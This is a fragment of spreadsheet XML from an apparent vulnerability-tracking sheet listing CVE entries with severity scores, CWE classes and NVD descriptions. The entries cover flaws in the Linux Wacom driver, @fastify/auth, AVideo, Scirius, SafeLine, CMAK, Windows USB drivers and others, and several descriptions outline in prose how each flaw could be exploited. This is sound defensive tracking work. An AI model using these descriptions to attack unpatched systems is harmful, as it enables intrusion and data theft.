      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: wacom: validate report length in wacom_intuos_pro2_bt_irq
wacom_intuos_pro2_bt_irq() receives the wire report length in `len`
but never consults it before parsing. After the report-id gate it
unconditionally calls wacom_intuos_pro2_bt_pen() and then, selected by
features.type, a fixed chain of sub-parsers, none of which receive
`len`:
	wacom_intuos_pro2_bt_pen(wacom);
	if (type == INTUOSP2_BT || type == INTUOSP2S_BT) {
		wacom_intuos_pro2_bt_touch(wacom);
		wacom_intuos_pro2_bt_pad(wacom);
		wacom_intuos_pro2_bt_battery(wacom);
	} else {
		wacom_intuos_gen3_bt_pad(wacom);
		wacom_intuos_gen3_bt_battery(wacom);
	}
Each sub-parser dereferences wacom-&gt;data at fixed offsets. The furthest
byte touched on each branch is:
  INTUOSP2_BT / INTUOSP2S_BT: wacom_intuos_pro2_bt_pad() reads data[285]
	(the touchring byte), so the report must be at least 286 bytes;
  INTUOSHT3_BT ("gen3"): wacom_intuos_gen3_bt_battery() reads data[45],
	so the report must be at least 46 bytes.
features.type is selected from the VID/PID id_table entry and
wacom_setup_device_quirks() force-registers the pen/pad/touch inputs
for that type independent of the report descriptor, so a malicious or
malfunctioning paired/spoofed Bluetooth peripheral can advertise that
VID/PID and send an undersized report that still satisfies the
data[0] == 0x80/0x81 gate. The driver then reads past the received
report and forwards the bytes to userspace via evdev (MSC_SERIAL /
ABS_MISC / ABS_WHEEL on the pen and pad input nodes), an out-of-bounds
read with a concrete userspace read-back channel, and a true
out-of-bounds read on transports whose backing buffer is sized to the
(small) report descriptor rather than a fixed-size staging buffer.
This is the same class of bug commit 2f1763f62909 ("HID: wacom: fix
out-of-bounds read in wacom_intuos_bt_irq") already hardened in the
sibling wacom_intuos_bt_irq(), which guards each report id against its
minimum length before parsing.
Guard wacom_intuos_pro2_bt_irq() the same way: before parsing, reject
reports shorter than the furthest offset the selected branch actually
dereferences, warn, and bail out. Because the whole pen/touch/pad/
battery chain runs unconditionally per branch, a single up-front check
against the maximum offset (286 bytes for INTUOSP2_BT/INTUOSP2S_BT,
46 bytes for the gen3 branch) bounds every sub-parser. Returning 0 on
a short report also skips those calls for the same malformed report,
which is the safe, conservative behavior.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89999</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92087</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-697</t>
        </is>
      </c>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>@fastify/auth is a Fastify plugin that composes multiple authentication and authorization strategies into a single route guard. In versions 5.0.0 through 5.1.0, when strategies are composed with the relation "or" option together with the run "all" option and one entry is a nested array acting as an AND group, the group is evaluated in an order-dependent way: an earlier failing check is silently dropped and the group's result becomes the outcome of its last check. As a result, a request that satisfies only the last member of an AND group, for example an attacker who holds a valid API key but is not an administrator, is authorized instead of rejected, and a related order-dependent bypass affects the mirror configuration where the top-level relation is "and" and a nested group uses "or". The issue is fixed in @fastify/auth 5.1.1, and users should upgrade to 5.1.1 or later. As a workaround, omit the run "all" option where it is not required, order each AND group so its stricter check is evaluated last, or replace nested AND groups with an explicit top-level "and" composition.</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92087</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92578</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="inlineStr"/>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through 29.0 contains an authentication bypass vulnerability where the stored password hash is accepted as a valid login credential through two independent code paths in loginFromRequest() and encryptPasswordVerify(). Attackers who obtain the stored users.password hash value can authenticate as any user by submitting the hash directly to login endpoints, completely bypassing password verification.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92578</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92604</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>Scirius through 3.8.0 contains an arbitrary file write vulnerability in the PCAP filestore upload endpoint that allows default User role users to write attacker-controlled JSON content to filesystem paths. Attackers can supply path traversal sequences in the uploaded document's _id field to escape the intended directory and write files with .json extension to arbitrary locations as root.</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92604</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92749</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr">
        <is>
          <t>CWE-338</t>
        </is>
      </c>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>SafeLine through 9.4.1 derives the management console session-signing secret from a time-seeded math/rand generator, allowing attackers to reconstruct the key offline. Unauthenticated remote attackers who can bound the install timestamp can regenerate the secret and forge valid administrator session cookies to gain control of protected sites.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92749</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92751</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr"/>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CMAK through 3.0.0.6 fails to install a cross-site request forgery filter, allowing attackers to perform state-changing actions on behalf of authenticated operators. Attackers can craft hidden forms that submit to destructive endpoints like topic deletion and cluster configuration changes, leveraging the operator's HTTP Basic authentication credentials or play-basic-authentication cookie without SameSite protection.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92751</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92763</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr"/>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>Rundeck through 6.2.1 fails to properly authorize the importConfig and importNodesSources parameters in the project archive import endpoint. Attackers with only the import action can replace project configuration files including security-relevant settings like node executors and SSH key paths that affect job execution.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92763</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92776</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr"/>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>Wiki.js through 2.5.314 fails to require path separators when matching START and END page rules, allowing attackers to access pages sharing a prefix with authorized folders. Users granted access to a folder can read and modify unrelated pages with matching prefixes, bypassing intended access controls.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92776</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92782</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr"/>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>Chroma through 1.5.9 fails to validate tenant and database segments when resolving collections, allowing authenticated attackers to access collections from other tenants by knowing the collection identifier. Attackers can read, modify, and update records in foreign collections by issuing requests under their own tenant path, bypassing authorization checks.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92782</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92783</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr"/>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>Yeti through 2.11.0 fails to validate caller permissions in the DELETE /api/v2/rbac/{id} endpoint, allowing users with read access to delete access control relationships. Attackers can revoke the owner's grant and permanently lock legitimate owners out of objects.</t>
        </is>
      </c>
      <c r="S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92783</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92785</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>Angel through 3.3.0 deserializes untrusted setAlgoMetrics payload using Kryo without class registration or allowlist validation. Unauthenticated network attackers can instantiate arbitrary classes or exhaust coordinator memory by sending crafted serialized objects to the master RPC endpoint.</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92785</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92793</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>GoAdmin through 1.2.26 fails to properly anchor the logout pattern when checking permissions, allowing authenticated users to bypass permission checks by appending a query parameter. Attackers can append a query string containing the admin prefix followed by /logout to reach administrative endpoints and perform unauthorized actions including reading sensitive data and modifying application state.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92793</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92806</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>phpList versions before 3.6.17 fail to validate cross-site request forgery tokens in the mass subscriber removal form handler. Attackers can induce logged-in administrators to visit crafted pages that silently delete and blacklist arbitrary subscriber addresses without authentication verification.</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92806</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K419"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419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85469</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr">
        <is>
          <t>CWE-1357</t>
        </is>
      </c>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in quay-builder-qemu. A remote attacker could exploit this by compromising the upstream `Noelware/docker-manifest-action` used in the release workflow, which is pinned to a mutable branch. This allows the attacker to inject arbitrary code, leading to the exfiltration of sensitive registry credentials or the publication of malicious images. The workflow also exposes the default GitHub token, increasing the severity of the compromise.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85469</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89947</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
